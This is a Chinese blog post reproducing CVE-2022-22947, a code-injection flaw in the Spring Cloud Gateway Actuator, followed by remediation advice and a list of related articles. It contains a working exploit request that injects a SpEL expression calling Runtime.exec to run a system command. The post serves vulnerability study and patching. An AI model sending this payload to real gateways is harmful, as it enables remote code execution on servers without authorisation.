Spring Cloud Gateway 远程代码执行漏洞 (CVE-2022-22947)

最新推荐文章于 2024-10-09 08:53:16 发布
最新推荐文章于 2024-10-09 08:53:16 发布
阅读量1k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: spring cloud gateway 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42299610/article/details/125100521
版权

概述
风险等级:高
缺陷描述:
使用Spring Cloud Gateway的应用程序在Actuator端点在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。
危害描述:
利用该漏洞获取服务器权限,实现远程代码执行。
漏洞复现
发送以下请求以添加包含恶意 SpEL 表达式的路由器hacktest6,响应包状态码为201,如图所示:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

在这里插入图片描述刷新网关,响应包状态码为200,配置生效,如图所示:
在这里插入图片描述发送以下请求以检索结果,新增的路由器hacktest6,成功执行系统命令,如图所示:

在这里插入图片描述修复建议
1.官方已发布安全版本,请及时下载更新,下载地址:https://github.com/spring-cloud/spring-cloud-gateway。
2.引入 security 依赖,打开安全限制并进行身份验证;同时设置单独的 Actuator 管理端口并配置不对外网开放。
注:该文章仅限技术学习

Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947
初岄的博客
07-09 1079
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
web_15534274656的博客
09-11 854
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
SpringCloud Gateway 远程代码执行漏洞
qq_33240556的博客
06-18 796
Spring Cloud Gateway(SCG)本身并没有远程代码执行漏洞,但是,如果你在配置过程中使用了不安全的代码或者依赖,可能会引入安全风险。:类似地,如果过滤器配置中的某些参数来自用户输入,且没有进行充分验证和过滤,也可能会被利用来执行远程代码。在使用自定义过滤器时,要确保传入过滤器的参数是安全的。:SCG依赖的其他库或组件可能存在安全漏洞,攻击者可以利用这些漏洞来执行远程代码。字段来自用户输入,且没有进行严格的验证和过滤,可能会被攻击者利用来执行远程代码。,就需要格外注意输入的合法性。
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1894
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
m0_63299551的博客
06-24 938
这里在burp抓包时要将burp代理地址改为本机地址要不然会抓不到 127.0.0.1的数据包。接着创建application.yml文件 具体步骤和代码如下。将pom.xml文件替换成下面所写的。接着配置maven 这里参考了一篇文章。可以看到环境搭建成功 接着进行漏洞复现。
Spring Cloud Gateway中存在远程代码执行漏洞容易受到代码注入攻击
happy_a_bin的博客
04-20 801
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。二、影响版本 Spring Cloud Gateway 3.1.0 Spring Cloud Gateway 3.0.0 - 3.0.6 Spring Cloud Gateway 其它不支持的、已不再更新的版本 三、处置措施 1、立刻升级至3.0.7以上(不含3.1.0)或3.1.1以上;
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1642
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
Spring Cloud Gateway 远程代码执行漏洞
qq_52072846的博客
03-18 597
漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 漏洞环境 git clone https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/docker-compose.yml dock
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
嘟的博客
07-11 397
SpringCloud GatewaySpring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactxor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。使用Spring Cloud Gateway的应用程序在Actuator端点在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。:受影响版本的用户需要应用以下修正。
Spring Cloud Gateway 远程代码执行CVE-2022-22947
最新发布
m0_62484818的博客
10-09 801
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的 API路由管理方式。Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
CVE-2022-22947 Spring Cloud Gateway远程代码执行
mirocky的博客
10-26 321
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_42299610

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值